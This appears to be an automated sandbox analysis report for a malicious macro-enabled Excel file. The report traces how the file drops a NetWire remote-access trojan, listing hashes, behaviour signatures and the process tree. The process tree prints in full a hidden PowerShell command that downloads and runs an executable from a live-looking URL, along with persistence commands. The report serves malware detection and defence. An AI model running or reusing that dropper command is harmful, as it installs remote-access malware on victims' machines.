Analysis
- max time kernel: 151s
- max time network: 83s
- platform: windows7_x64
- resource: win7v200430
- submitted: 29-06-2020 19:51
- Static task: static1
- Behavioral task: behavioral1
- Sample: PO29062020.xlsm
- Resource: win7v200430
- Platform: windows7_x64
- 0 signatures
- 0 seconds
General
- Target: PO29062020.xlsm
- Size: 407KB
- MD5: 2958c347433029ff3d06f2e3f32a735b
- SHA1: b729fbe5d5642ca5987db47352b134797852d097
- SHA256: d70d7499eec43adaa9d908f4df45fbb064a53e488f765ec5a5cb99baf1285389
- SHA512: 0ff681ca3254a6ae552b91a9017aa660725e148c35adaebc830f7f37778d8a1f05fe64681fbc9732a7e6c6992c325f2c7c14eac20f813e78a15de8f28bba28d6
Malware Config
Extracted
- Language: ps1
- URLs (exe.dropper): http://longi.ca/wdfr.exe
Signatures
- Blacklisted process makes network request (1 IoC)
  Processes:
    flow  pid   process
    4     1612  powershell.exe
- Executes dropped EXE (2 IoCs)
  Processes:
    pid   process
    1812  putty.exe
    1852  whdhost.exe
- Suspicious use of SetThreadContext (1 IoC)
  Processes:
    description                          pid   process    target process
    PID 1812 set thread context of 1852  1812  putty.exe  whdhost.exe
- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  Processes:
    description              pid   process
    Token: SeDebugPrivilege  1612  powershell.exe
    Token: SeDebugPrivilege  1812  putty.exe
- Loads dropped DLL (1 IoC)
  Processes:
    pid   process
    1812  putty.exe
- Drops startup file (1 IoC)
  Processes:
    description   ioc                                                                                       process
    File created  C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\name.exe.lnk  putty.exe
- NTFS ADS (1 IoC)
  Processes:
    description   ioc                                                              process
    File created  C:\Users\Admin\AppData\Local\Temp\FolderN\name.exe:Zone.Identifier  cmd.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
    pid   process
    1612  powershell.exe
    1812  putty.exe
    1812  putty.exe
- Office loads VBA resources, possible macro or embedded object present
- Suspicious use of SetWindowsHookEx (5 IoCs)
  Processes:
    pid   process    count
    1356  EXCEL.EXE  5
- Process spawned unexpected child process (1 IoC)
  This typically indicates the parent process was compromised via an exploit or macro.
  Processes:
    description                                                                                          pid   pid_target  process         target process
    Parent C:\Program Files\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process    1612  1356        powershell.exe  EXCEL.EXE
- Suspicious use of WriteProcessMemory (27 IoCs)
  Processes:
    description                       pid   process         target process  count
    PID 1356 wrote to memory of 1612  1356  EXCEL.EXE       powershell.exe  3
    PID 1612 wrote to memory of 1812  1612  powershell.exe  putty.exe       4
    PID 1812 wrote to memory of 1852  1812  putty.exe       whdhost.exe     12
    PID 1812 wrote to memory of 1176  1812  putty.exe       cmd.exe         4
    PID 1812 wrote to memory of 1636  1812  putty.exe       cmd.exe         4
- NetWire RAT payload (2 IoCs)
  Processes:
    resource                                                                   yara_rule
    behavioral1/memory/1852-9-0x0000000000400000-0x0000000000433000-memory.dmp   netwire
    behavioral1/memory/1852-12-0x0000000000400000-0x0000000000433000-memory.dmp  netwire
- Suspicious behavior: AddClipboardFormatListener (1 IoC)
  Processes:
    pid   process
    1356  EXCEL.EXE
Processes
- C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
  Command line: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\PO29062020.xlsm
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  - Suspicious behavior: AddClipboardFormatListener
  - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://longi.ca/wdfr.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
    - Blacklisted process makes network request
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Process spawned unexpected child process
    - Suspicious use of WriteProcessMemory
    - C:\Users\Admin\AppData\Local\Temp\putty.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\putty.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Loads dropped DLL
      - Drops startup file
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of WriteProcessMemory
      - C:\Users\Admin\AppData\Local\Temp\whdhost.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\whdhost.exe"
        - Executes dropped EXE
      - C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c copy "C:/Users/Admin/AppData/Local/Temp/putty.exe" "%temp%\FolderN\name.exe" /Y
      - C:\Windows\SysWOW64\cmd.exe
        Command line: "C:\Windows\System32\cmd.exe" /c echo [zoneTransfer]ZoneID = 2 > %temp%\FolderN\name.exe:Zone.Identifier
        - NTFS ADS
Downloads
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- C:\Users\Admin\AppData\Local\Temp\putty.exe
- C:\Users\Admin\AppData\Local\Temp\whdhost.exe
- \Users\Admin\AppData\Local\Temp\whdhost.exe
- memory/1176-13-0x0000000000000000-mapping.dmp
- memory/1356-2-0x0000000005E80000-0x0000000005F80000-memory.dmp (Filesize: 1024KB)
- memory/1356-3-0x0000000005E80000-0x0000000005F80000-memory.dmp (Filesize: 1024KB)
- memory/1356-1-0x0000000005E80000-0x0000000005F80000-memory.dmp (Filesize: 1024KB)
- memory/1612-4-0x0000000000000000-mapping.dmp
- memory/1636-14-0x0000000000000000-mapping.dmp
- memory/1812-5-0x0000000000000000-mapping.dmp
- memory/1852-10-0x000000000040242D-mapping.dmp
- memory/1852-9-0x0000000000400000-0x0000000000433000-memory.dmp (Filesize: 204KB)
- memory/1852-12-0x0000000000400000-0x0000000000433000-memory.dmp (Filesize: 204KB)